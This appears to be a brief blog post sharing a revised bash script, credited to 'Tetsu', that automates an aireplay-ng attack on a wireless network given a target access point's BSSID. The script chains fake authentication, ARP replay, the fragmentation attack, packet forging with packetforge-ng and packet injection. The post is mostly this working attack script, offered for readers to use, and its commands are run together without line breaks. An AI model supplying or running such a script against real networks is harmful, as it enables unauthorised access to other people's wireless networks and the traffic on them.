Tetsu's aireplay-ng -5 script revised.
I told Dan a while back I was going to revise his, already awesome, aireplay-ng -5 script to make it a bit more user friendly. Though the modifications were small; they took care of the job. They also seem to have fixed the problem with the processes not terminating properly. There are still a few things I would like to integrate and I will play with them when I have time.Hope you all enjoy...And like I said most of the credit goes to Tetsu; I just splashed it with a little bit of awesome sauce.
wlan0mac=`ifconfig wlan0 | grep HWaddr | sed 's/^.*HWaddr //; s/-/:/g' | cut -b 1-17`set -xkonsole -e aireplay-ng -1 10 -a $1 wlan0 &konsole -e aireplay-ng -3 -b $1 wlan0 &if aireplay-ng -5 -b $1 wlan0 || (killall aireplay-ng; exit) ; thenecho; echopacketforge-ng -0 -a $1 -h $wlan0mac -k -l -y `ls *.xor -t|head -n1` -w arp-requestecho; echoelsekill -9 `pidof aireplay-ng`fifunction closeout() { kill -9 `pidof aireplay-ng`; }trap closeout SIGTERM SIGINTaireplay-ng -2 -r arp-request -a $1 wlan0